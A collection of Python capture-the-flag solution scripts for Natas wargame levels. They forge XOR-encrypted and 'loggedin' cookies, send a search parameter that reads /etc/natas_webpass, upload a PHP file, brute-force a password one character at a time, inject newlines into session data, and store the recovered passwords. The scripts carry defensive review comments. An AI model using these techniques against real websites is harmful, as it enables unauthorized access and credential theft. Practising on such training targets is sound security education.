示例#1
def main():
    """Derive the cookie XOR key from a known plaintext, then request the page
    with a re-encoded cookie and store the natas12 password if it is shown.

    Relies on names defined elsewhere in the file: USER, PASSWORD, URL,
    DEFAULT_JSON, MY_JSON, get_cookie, xor_encrypt, shorten_key and natas.
    Written against Python 2 str semantics (b64encode of a str, str regex
    over response.content).
    """
    basic_token = base64.b64encode('%s:%s' % (USER, PASSWORD))

    # The cookie arrives with '=' URL-escaped as %3D; undo that, then base64.
    escaped_cookie = get_cookie(basic_token)
    cookie_bytes = base64.b64decode(escaped_cookie.replace('%3D', '='))

    # XOR-ing the cookie with its known plaintext exposes the key stream.
    # Presumably shorten_key collapses the repetition to a single period --
    # confirm against its definition. Defensive takeaway: a repeating XOR key
    # gives client-held state neither secrecy nor integrity; such data needs
    # a keyed MAC or must stay server-side.
    key = shorten_key(xor_encrypt(cookie_bytes, DEFAULT_JSON))
    print('key found: %s' % key)

    replacement_cookie = base64.b64encode(xor_encrypt(MY_JSON, key))

    response = requests.get(
        URL,
        headers={'Authorization': 'Basic %s' % basic_token},
        cookies={'data': replacement_cookie},
    )

    # Keep the last occurrence, as a plain overwrite-in-a-loop would.
    hits = [m.group(1)
            for m in re.finditer(r"natas12 is (\w+)", response.content, re.MULTILINE)]
    if not hits:
        return

    password = hits[-1]
    print ('password found: %s' % password)
    print ('adding to credentials....')
    natas.save_credentials('natas12', password)
    print ('done')
示例#2
def main():
    """Send QUERY as the 'needle' parameter and store the natas11 password
    if the response contains a '/etc/natas_webpass/natas11:<word>' line.

    USER, PASSWORD, URL, QUERY and natas are defined elsewhere in the file.
    Written against Python 2 str semantics.
    """
    basic_token = base64.b64encode('%s:%s' % (USER, PASSWORD))

    response = requests.get(
        URL,
        headers=dict(Authorization='Basic %s' % basic_token),
        params=dict(needle=QUERY),
    )

    pattern = re.compile(r"\/etc\/natas_webpass\/natas11:(\w+)", re.MULTILINE)
    hits = [m.group(1) for m in pattern.finditer(response.content)]

    # Nothing matched: leave the credential store untouched.
    if not hits:
        return

    password = hits[-1]  # last occurrence wins
    print ('found password: %s' % password )
    print ('adding to credentials....')
    natas.save_credentials('natas11', password)
    print ('done')
示例#3
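def main():
    """POST the multipart PAYLOAD, fetch the file the response links to, and
    store that file's content as the natas13 password.

    USER, PASSWORD, URL, PAYLOAD and natas are defined elsewhere in the file.
    Stops early, without touching the credential store, when the upload
    response contains no link to a '<dir>/<name>.php' file.

    NOTE(review): str input to b64encode and a str pattern over
    response.content only work on Python 2; Python 3 needs bytes and
    response.text respectively.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))

    response = requests.post(
        '%sindex.php' % URL,
        headers={
            'Authorization': 'Basic %s' % b64,
            # presumably this boundary has to match the one used inside
            # PAYLOAD -- confirm against its definition
            'Content-Type': 'multipart/form-data; boundary=---------------------------208637385607827912102593443'
        },
        data=PAYLOAD
    )

    regex = r"href=\"(\w+\/\w+\.php)\""
    matches = re.finditer(regex, response.content, re.MULTILINE)

    # Keep the last link found in the page.
    filename = None
    for match in matches:
        filename = match.group(1)

    if filename is None:
        print('failed to find filename')
        # The original had a bare `exit` here, which is only a name lookup and
        # does nothing: execution continued, requested '<URL>None' and saved
        # that response as the password. Return so a failed upload cannot
        # overwrite the stored credential.
        return

    print('%s was uploaded succesfully' % filename)

    response = requests.get(
        '%s%s' % (URL, filename),
        headers=dict(Authorization='Basic %s' % b64)
    )
    password = response.content.replace('\n', '')

    print('password found: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas13', password)
    print('done')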
示例#4
def main():
    """Call do_request for each id from 0 to 640 and store the first password
    it returns as the natas20 credential.

    do_request and natas are defined elsewhere in the file; do_request is
    expected to return None when an id yields nothing.
    """
    for candidate in range(641):
        # Progress marker every 20 requests.
        if candidate % 20 == 0:
            print('requesting: %d' % candidate)

        password = do_request(candidate)
        if password is None:
            continue

        print('found password at %d: %s' % (candidate, password))
        print('adding to credentials....')
        natas.save_credentials('natas20', password)
        print('done')
        break
示例#5
def main():
    """Fetch URL and store the first 'Password: <word>' value in the response
    as the natas25 credential.

    URL, B64 and natas are defined elsewhere in the file. Nothing is saved
    when the page contains no match.
    """
    response = requests.get(URL, headers={'Authorization': B64})

    pattern = re.compile(r"Password: (\w+)", re.MULTILINE)
    # Only the first occurrence is used.
    first_hit = next(pattern.finditer(response.content), None)
    if first_hit is None:
        return

    print('found password: %s' % first_hit.group(1))
    print('adding to credentials....')
    natas.save_credentials('natas25', first_hit.group(1))
    print('done')
示例#6
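def main():
    """Fetch URL with the stored credential and save the natas2 password found
    in an HTML comment of the response.

    URL and natas are defined elsewhere in the file. When the comment is not
    present, a message is printed and the credential store is left untouched.

    NOTE(review): str input to b64encode and a str pattern over
    response.content only work on Python 2; Python 3 needs bytes and
    response.text respectively.
    """
    usr = '******'
    password = natas.get_credential(usr)
    b64 = base64.b64encode('%s:%s' % (usr, password))

    response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})

    regex = r"<!--The password for natas2 is (\w*?) -->"
    # First occurrence only. The original assigned found_password inside the
    # loop and used it afterwards, so a page without the comment raised
    # NameError instead of reporting the miss.
    first_match = next(re.finditer(regex, response.content, re.MULTILINE), None)
    if first_match is None:
        print('password not found')
        return

    found_password = first_match.group(1)
    print('found password: %s' % found_password)
    print('adding to credentials file....')
    natas.save_credentials('natas2', found_password)
    print('done')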
示例#7
def main():
    """Fetch URL with the stored credential for USER and save the natas3
    password if the response contains a 'natas3:<word>' entry.

    USER, URL and natas are defined elsewhere in the file. Written against
    Python 2 str semantics.
    """
    stored_secret = natas.get_credential(USER)
    basic_token = base64.b64encode('%s:%s' % (USER, stored_secret))

    response = requests.get(
        URL,
        headers=dict(Authorization='Basic %s' % basic_token),
    )

    pattern = re.compile(r"natas3:(\w+)", re.MULTILINE)
    hits = [m.group(1) for m in pattern.finditer(response.content)]

    # No entry in the response: nothing to save.
    if not hits:
        return

    password = hits[-1]  # last occurrence wins
    print('found password: %s' % password)
    print('adding to credentials file....')
    natas.save_credentials('natas3', password)
    print('done')
示例#8
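def main():
    """Fetch users.txt from the folder returned by find_folder_name and save
    the natas4 password listed in it.

    USER, PASSWORD, URL, find_folder_name and natas are defined elsewhere in
    the file. Always returns None. When no 'natas4:<word>' line is present a
    message is printed and the credential store is left untouched.

    NOTE(review): str input to b64encode and a str pattern over
    response.content only work on Python 2; Python 3 needs bytes and
    response.text respectively.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
    fldr = find_folder_name(b64)

    response = requests.get('%s%susers.txt' % (URL, fldr),
                            headers={'Authorization': 'Basic %s' % b64})

    regex = r"^natas4:(\w+?)$"
    matches = re.finditer(regex, response.content, re.MULTILINE)

    # Keep the last matching line.
    password = None
    for match in matches:
        password = match.group(1)

    # The original saved unconditionally, so a miss printed
    # 'found password: None' and stored None as the natas4 credential.
    if password is None:
        print('password not found')
        return None

    print('found password: %s' % password)
    print('adding to credentials file....')
    natas.save_credentials('natas4', password)
    print('done')

    return None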
示例#9
def main():
    """Recover the natas16 password one character at a time and store it.

    guessed_correct (defined elsewhere in the file) is used as a yes/no
    check on a candidate prefix; each confirmed prefix is printed as it
    grows. The loop ends when no letter or digit extends the prefix.
    USER, PASSWORD and natas are also defined elsewhere.

    Defensive takeaway: an endpoint that answers differently for a correct
    partial guess turns a fixed-length secret into one recoverable in a
    number of requests linear in its length.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
    alphabet = string.ascii_letters + string.digits

    password = ''
    while True:
        for candidate in alphabet:
            if guessed_correct(password + candidate, b64):
                password += candidate
                print(password)
                break
        else:
            # No character extended the prefix: the password is complete.
            break

    print('found password: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas16', password)
    print('done')
示例#10
def main():
    """Request URL with a fresh session id and store every 32-character token
    that follows a bracketed timestamp in the response as the natas26
    credential.

    random_string, URL (a format string taking the session id), B64,
    USER_AGENT and natas are defined elsewhere in the file. Each match is
    saved in turn, so the last one is what remains stored.
    """
    session = random_string()

    request_headers = {
        'Authorization': B64,
        'User-Agent': USER_AGENT,
    }
    # The same value is used in the URL and as the PHPSESSID cookie.
    response = requests.get(
        URL % session,
        headers=request_headers,
        cookies={'PHPSESSID': session},
    )

    pattern = re.compile(
        r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})",
        re.MULTILINE,
    )
    for hit in pattern.finditer(response.content):
        print('found password: %s' % hit.group(1))
        print('adding to credentials....')
        natas.save_credentials('natas26', hit.group(1))
        print('done')
示例#11
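def main():
    """Fetch URL with a 'loggedin=1' cookie and save the natas6 password shown
    in the response.

    USER, PASSWORD, URL and natas are defined elsewhere in the file. When
    the expected sentence is absent, a message is printed and nothing is
    saved.

    NOTE(review): str input to b64encode and a str pattern over
    response.content only work on Python 2; Python 3 needs bytes and
    response.text respectively.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))

    # Defensive takeaway: the request states its own login status in a
    # cookie; a server that trusts such a client-set flag has no real
    # authentication check behind it.
    response = requests.get(URL,
                            headers={
                                'Authorization': 'Basic %s' % b64,
                                'Cookie': 'loggedin=1;'
                            })

    regex = r"The password for natas6 is (\w+)"
    # First occurrence only. The original assigned found_password inside the
    # loop and used it afterwards, so a response without the sentence raised
    # NameError instead of reporting the miss.
    first_match = next(re.finditer(regex, response.content, re.MULTILINE), None)
    if first_match is None:
        print('password not found')
        return

    found_password = first_match.group(1)
    print('found password: %s' % found_password)
    print('adding to credentials file....')
    natas.save_credentials('natas6', found_password)
    print('done')

    # NOTE(review): this writes the whole credential store to stdout, so every
    # saved password ends up in terminal scrollback and any captured logs.
    # Kept for compatibility; consider removing it or gating it behind a flag.
    print('DEBUG: credentials - %s' % natas.get_credentials())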
示例#12
def main():
    """POST the login form and store the natas15 password if the response
    contains 'natas15 is <word>'.

    USER, PASSWORD, URL and natas are defined elsewhere in the file. The
    form field values appear masked ('******') in this listing. Written
    against Python 2 str semantics.
    """
    basic_token = base64.b64encode('%s:%s' % (USER, PASSWORD))

    form_fields = {
        'username': '******',
        'password': '******',
    }
    response = requests.post(
        URL,
        headers={'Authorization': 'Basic %s' % basic_token},
        data=form_fields,
    )

    pattern = re.compile(r"natas15 is (\w+)", re.MULTILINE)
    hits = [m.group(1) for m in pattern.finditer(response.content)]

    # Nothing matched: leave the credential store untouched.
    if not hits:
        return

    password = hits[-1]  # last occurrence wins
    print('password found: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas15', password)
    print('done')
示例#13
def main():
    """Obtain the encoded secret, decode it, submit it, and store the natas9
    password if the response reveals it.

    USER, PASSWORD, URL, get_encoded_secret, decode_secret and natas are
    defined elsewhere in the file. Written against Python 2 str semantics.

    Defensive takeaway: a secret that the client can fetch in encoded form
    and reverse locally is protected by encoding only, not by a key.
    """
    basic_token = base64.b64encode('%s:%s' % (USER, PASSWORD))

    # decode_secret reverses whatever encoding get_encoded_secret returned.
    secret = decode_secret(get_encoded_secret(basic_token))

    form_fields = dict(secret=secret, submit='Submit+Query')
    response = requests.post(
        URL,
        headers=dict(Authorization='Basic %s' % basic_token),
        data=form_fields,
    )

    pattern = re.compile(r"The password for natas9 is (\w+)", re.MULTILINE)
    hits = [m.group(1) for m in pattern.finditer(response.content)]

    # Nothing matched: leave the credential store untouched.
    if not hits:
        return

    password = hits[-1]  # last occurrence wins
    print('found password: %s' % password)
    print('adding password to credentials....')
    natas.save_credentials('natas9', password)
    print('done')
示例#14
def main():
    """Submit a name containing an embedded newline, reuse the resulting
    session cookie, and store the first 'Password: <word>' value shown as
    the natas21 credential.

    URL, B64 and natas are defined elsewhere in the file. Nothing is saved
    when the second response contains no match.

    Defensive takeaway: presumably the server persists session fields one
    per line (not visible from here); any such store must reject or escape
    line breaks in user-supplied values, or use a structured serialiser.
    """
    injection = 'admin\nadmin 1'

    # First request: create the session and capture its id.
    setup_response = requests.post(
        URL,
        headers={'Authorization': B64},
        data=dict(name=injection),
    )
    cookie = setup_response.cookies['PHPSESSID']

    print('cookie: %s' % cookie)

    # Second request: load the page again under the same session.
    response = requests.get(
        URL,
        headers={'Authorization': B64},
        cookies={'PHPSESSID': cookie},
    )

    pattern = re.compile(r"Password: (\w+)", re.MULTILINE)
    # Only the first occurrence is used.
    first_hit = next(pattern.finditer(response.content), None)
    if first_hit is None:
        return

    print('found password: %s' % first_hit.group(1))
    print('adding to credentials....')
    natas.save_credentials('natas21', first_hit.group(1))
    print('done')